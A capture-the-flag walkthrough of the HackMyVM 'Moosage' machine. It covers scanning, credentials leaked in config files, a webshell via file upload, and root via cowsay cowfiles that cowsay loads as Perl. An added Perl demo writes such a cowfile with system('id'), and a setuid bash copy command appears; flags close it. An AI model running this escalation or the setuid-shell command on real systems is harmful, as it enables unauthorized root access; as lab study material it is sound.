
hackmyvm Moosage machine walkthrough

Difficulty: Hard


Network scan

Interface: eth0, type: EN10MB, MAC: 00:0c:29:d1:27:55, IPv4: 192.168.137.190
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.137.1	3e:21:9c:12:bd:a3	(Unknown: locally administered)
192.168.137.64	a0:78:17:62:e5:0a	Apple, Inc.
192.168.137.83	3e:21:9c:12:bd:a3	(Unknown: locally administered)

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.059 seconds (124.33 hosts/sec). 3 responded

Port scan

root@LingMj:~/xxoo/jarjar# nmap -p- -sV -sC 192.168.137.83 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-18 02:56 EDT
Nmap scan report for moosage.mshome.net (192.168.137.83)
Host is up (0.064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 02:65:e6:05:af:c8:81:9c:30:b0:da:e3:1e:d8:be:02 (RSA)
|   256 3f:7d:4b:86:8d:c7:01:8f:b3:56:6d:65:c2:e5:cf:4e (ECDSA)
|_  256 8e:d4:b8:d6:8e:d9:61:a1:3e:7f:5e:d7:ec:dc:bb:de (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.14.2
MAC Address: 3E:21:9C:12:BD:A3 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.85 seconds

Getting a webshell

picture 0
picture 1
picture 2
picture 3

Don't know the password.

picture 4
picture 5
picture 6

version: "3"

services:
  webserver:
    image: m1k1o/blog:latest
    container_name: blog_apache
    environment:
      TZ: Europe/Vienna
      BLOG_DB_CONNECTION: mysql
      BLOG_MYSQL_HOST: mariadb
      BLOG_MYSQL_PORT: 3306
      BLOG_MYSQL_USER: root
      BLOG_MYSQL_PASS: root
      BLOG_DB_NAME: blog
    restart: unless-stopped
    ports:
      - ${HTTP_PORT-80}:80
    volumes: 
      - ${DATA-./data}:/var/www/html/data
  mariadb:
    image: mariadb:10.1
    container_name: blog_mariadb
    environment:
      MYSQL_DATABASE: blog
      MYSQL_ROOT_PASSWORD: root
    restart: unless-stopped
    volumes:
      - mariadb:/var/lib/mysql
      - ./app/db/mysql:/docker-entrypoint-initdb.d:ro
volumes:
  mariadb:

There is a docker-compose file here (image m1k1o/blog, backed by MariaDB with credentials root / root).

[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db

;[database]
db_connection = mysql
mysql_socket = /run/mysqld/mysqld.sock
mysql_host = localhost
mysql_port = 3306
mysql_user = baca
mysql_pass = youareinsane
db_name = moosage

[profile]
title = Blog
name = Max Musermann
pic_small = static/images/profile.jpg
pic_big = static/images/profile_big.jpg
;cover = static/images/cover.jpg

[language]
lang = en

[components]
highlight = true

[custom]
theme = theme02
;header = data/header.html
;styles[] = static/styles/custom1.css
;styles[] = static/styles/custom2.css
;scripts = static/styles/scripts.css

[bbcode]
;bbtags[quote] = "<quote>{param}</quote>"

[admin]
force_login = true
nick = demo
pass = demo

[friends]
;friends[user] = pass
;friends[user] = pass

[directories]
images_path = data/i/
thumbnails_path = data/t/
logs_path = data/logs/

[proxy]
;proxy = hostname:port
;proxyauth = username:password
;proxytype = CURLPROXY_HTTP ; default, if not set
;proxytype = CURLPROXY_SOCKS4
;proxytype = CURLPROXY_SOCKS5

;URL_PREFIX type:
;proxy = http://your.page.com/proxy.cgi?
;proxyauth = username:password
;proxytype = URL_PREFIX

[system]
;timezone = Europe/Vienna
system_name = blog
version = 1.3
debug = false
logs = false

There is also a config.ini. Note that only the second [database] header is commented out; the db_connection = mysql line and the credentials under it are live, and in an INI parser that keeps the last duplicate key (PHP's parse_ini_file does) the MySQL settings win. Either way the file hands over two credential pairs: baca / youareinsane for MySQL and demo / demo for the [admin] login, with force_login = true.

picture 7

The login account is right there above: demo / demo.

picture 9

picture 8

File upload

Privilege escalation

picture 10

The password is also in the config above; this part feels pretty easy.

picture 11
picture 12

Can't log in.

picture 13
picture 14

No useful information so far, so I'm guessing there are two routes: suForce (brute-forcing su) or a kernel exploit. Let's look at the kernel first.

picture 15

No cron jobs.

picture 16

Nothing on the kernel side either.

picture 17
picture 18

Pinning my hopes on /usr/games/cowsay.

picture 19

picture 20

It requires a private key; I thought password login would work.

picture 21
picture 22

Sure enough, it's here.

picture 23

This shows up as soon as I log in.

picture 24

How do we exploit it?

#!/usr/bin/perl

##
## Cowsay 3.03
##
## This file is part of cowsay.  (c) 1999-2000 Tony Monroe.
##

use Text::Tabs qw(expand);
use Text::Wrap qw(wrap fill $columns);
use File::Basename;
use Getopt::Std;
use Cwd;
use Text::CharWidth qw(mbswidth);

if (${^UTF8LOCALE}) {
    binmode STDIN, ':utf8';
    binmode STDOUT, ':utf8';
    require Encode;
    eval { $_ = Encode::decode_utf8($_,1) } for @ARGV;
}

$version = "3.03";
$progname = basename($0);
$eyes = "oo";
$tongue = "  ";
$cowpath = $ENV{'COWPATH'} || '/usr/share/cowsay/cows';
@message = ();
$thoughts = "";

## Yeah, this is rude, I know.  But hopefully it gets around a nasty
## little version dependency.

$Text::Wrap::initial_tab = 8;
$Text::Wrap::subsequent_tab = 8;
$Text::Wrap::tabstop = 8;

## One of these days, we'll get it ported to Windows.  Yeah, right.

if (($^O eq "MSWin32") or ($^O eq "Windows_NT")) {	## Many perls, eek!
    $pathsep = ';';
} else {
    $pathsep = ':';
}

%opts = (
    'e'		=>	'oo',
    'f'		=>	'default.cow',
    'n'		=>	0,
    'T'		=>	'  ',
    'W'		=>	40,
);

getopts('bde:f:ghlLnNpstT:wW:y', \%opts);

&display_usage if $opts{'h'};
&list_cowfiles if $opts{'l'};

$borg = $opts{'b'};
$dead = $opts{'d'};
$greedy = $opts{'g'};
$paranoid = $opts{'p'};
$stoned = $opts{'s'};
$tired = $opts{'t'};
$wired = $opts{'w'};
$young = $opts{'y'};
$eyes = substr($opts{'e'}, 0, 2);
$tongue = substr($opts{'T'}, 0, 2);
$the_cow = "";

&slurp_input;
$Text::Wrap::columns = $opts{'W'};
@message = ($opts{'n'} ? expand(@message) : 
	    split("\n", fill("", "", @message)));
&construct_balloon;
&construct_face;
&get_cow;
print @balloon_lines;
print $the_cow;

sub list_cowfiles {
    my $basedir;
    my @dirfiles;
    chop($basedir = cwd);
    for my $d (split(/$pathsep/, $cowpath)) {
	print "Cow files in $d:\n";
	opendir(COWDIR, $d) || die "$0: Cannot open $d\n";
	for my $file (readdir COWDIR) {
	    if ($file =~ s/\.cow$//) {
		push(@dirfiles, $file);
	    }
	}
	closedir(COWDIR);
	print wrap("", "", sort @dirfiles), "\n";
	@dirfiles = ();
	chdir($basedir);
    }
    exit(0);
}

sub slurp_input {
    unless ($ARGV[0]) {
	chomp(@message = <STDIN>);
    } else {
	&display_usage if $opts{'n'};
	@message = join(' ', @ARGV);
    }
}

sub maxlength {
    my ($l, $m);
    $m = -1;
    for my $i (@_) {
	# $l = mbswidth $i;
        $l = mbswidth $i =~ s/\e\[\d+(?>(;\d+)*)m//gr;
	$m = $l if ($l > $m);
    }
##  maxlength patch from Jeronimo Pellegrini (Closes: #165218)
    if ($m == -1) {
	$m = 0;
    }
    return $m;
}

sub colstr {
    (my $str, my $columns) = @_;
    $str . ' ' x ($columns - mbswidth $str)
}

sub construct_balloon {
    my $max = &maxlength(@message);
    my $max2 = $max + 2;	## border space fudge.
    my $format = "%s %s %s\n";
    my @border;	## up-left, up-right, down-left, down-right, left, right
    if ($0 =~ /think/i) {
	$thoughts = 'o';
	@border = qw[ ( ) ( ) ( ) ];
    } elsif (@message < 2) {
	$thoughts = '\\';
	@border = qw[ < > ];
    } else {
	$thoughts = '\\';
	if ($V and $V gt v5.6.0) {		# Thanks, perldelta.
	    @border = qw[ / \\ \\ / | | ];
	} else {
	    @border = qw[ / \ \ / | | ];	
	}
    }
## no trailing spaces (#276144)
    push(@balloon_lines, 
	" " . ("_" x $max2) . "\n" ,
        sprintf($format, $border[0], colstr($message[0], $max), $border[1]),
	(@message < 2 ? "" :  
            map { sprintf($format, $border[4], colstr($_, $max), $border[5]) } 
		@message[1 .. $#message - 1]),
	(@message < 2 ? "" : 
            sprintf($format, $border[2], colstr($message[$#message], $max), $border[3])),
        " " . ("-" x $max2) . "\n"
    );
}

sub construct_face {
    if ($borg) { $eyes = "=="; }
    if ($dead) { $eyes = "xx"; $tongue = "U "; }
    if ($greedy) { $eyes = "\$\$"; }
    if ($paranoid) { $eyes = "@@"; }
    if ($stoned) { $eyes = "**"; $tongue = "U "; }
    if ($tired) { $eyes = "--"; } 
    if ($wired) { $eyes = "OO"; } 
    if ($young) { $eyes = ".."; }
}

sub get_cow {
##
## Get a cow from the specified cowfile; otherwise use the default cow
## which was defined above in $the_cow.
##
    my $f = $opts{'f'};
    my $full = "";
    if ($opts{'f'} =~ m,/,) {
	$full = $opts{'f'};
    } else {
	for my $d (split(/:/, $cowpath)) {
	    if (-f "$d/$f") {
		$full = "$d/$f";
		last;
	    } elsif (-f "$d/$f.cow") {
		$full = "$d/$f.cow";
		last;
	    }
	}
	if ($full eq "") {
	    die "$progname: Could not find $f cowfile!\n";
	}
    }
    do $full;
    die "$progname: $@\n" if $@;
}

sub display_usage {
	die <<EOF;
cow{say,think} version $version, (c) 1999 Tony Monroe
Usage: $progname [-bdgpstwy] [-h] [-e eyes] [-f cowfile] 
          [-l] [-n] [-T tongue] [-W wrapcolumn] [message]
EOF
}

It's written in Perl.

picture 25

The cow files are all writable, so just write a command into one of them.

picture 26
picture 27

Didn't work.

picture 28

Do it in Perl instead.

picture 30

picture 29

That really was it; done.

picture 31
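As an added example (not code from the original post or from cowsay), the script below reproduces what cowsay's get_cow does at the end: it loads the cowfile with `do $full`, so a cowfile is a Perl script, not a shell script. It writes two cowfiles into a temporary COWPATH: one containing a raw shell command, which fails because it is not valid Perl (consistent with the failed attempt above), and one containing a `system()` call followed by a normal `$the_cow` definition, which runs the command and still prints a cow so nothing looks odd to whoever runs cowsay. The temporary directory, the `load_cow` helper and the `id` command are assumptions made for the illustration.

```perl
#!/usr/bin/perl
# Added example, not from the original post or from cowsay itself.
# Shows why a cowfile must be Perl: cowsay's get_cow() ends in `do $full;`,
# so whatever is in the cowfile runs with the privileges of the cowsay caller.
use strict;
use warnings;
use File::Temp qw(tempdir);

# Scratch COWPATH (assumption for the demo) so /usr/share/cowsay is untouched.
my $dir = tempdir(CLEANUP => 1);

sub write_file {
    my ($path, $content) = @_;
    open my $fh, '>', $path or die "cannot write $path: $!";
    print $fh $content;
    close $fh;
}

# 1. A shell command dropped straight into the cowfile. This is not valid
#    Perl, so `do` fails (compile or runtime error) and sets $@.
write_file("$dir/shell.cow", "cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash\n");

# 2. A valid Perl cowfile: runs a command via system(), then still assigns
#    $the_cow so cowsay prints a normal cow afterwards. Written with a
#    single-quoted heredoc so $thoughts and \\ reach the cowfile literally,
#    exactly as in the stock default.cow.
write_file("$dir/perl.cow", <<'COW');
system("id");                 # runs as whoever invoked cowsay (assumed: `id`)
$the_cow = <<"EOC";
        $thoughts   ^__^
         $thoughts  (oo)\\_______
            (__)\\       )\\/\\
                ||----w |
                ||     ||
EOC
COW

# Mimic cowsay's get_cow(): `do $full; die "$progname: $@\n" if $@;`
# cowsay and the cowfile share package globals, hence `our`.
sub load_cow {
    my ($file) = @_;
    our $the_cow  = "";
    our $thoughts = "\\";
    do $file;
    return $@ ? "error: $@" : $the_cow;
}

print "shell.cow -> ", load_cow("$dir/shell.cow"), "\n";
print "perl.cow  -> ", load_cow("$dir/perl.cow");
```

Because `do` reports the error through `$@` and cowsay dies on it, a broken cowfile is noisy; a payload that is valid Perl and still sets `$the_cow` is silent, which is why the Perl variant is the one that works here.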

Overall not that hard; medium at most.

user flag: hmvmessageme

root flag: hmvyougotmooooooo

This post is licensed under CC BY 4.0 by the author.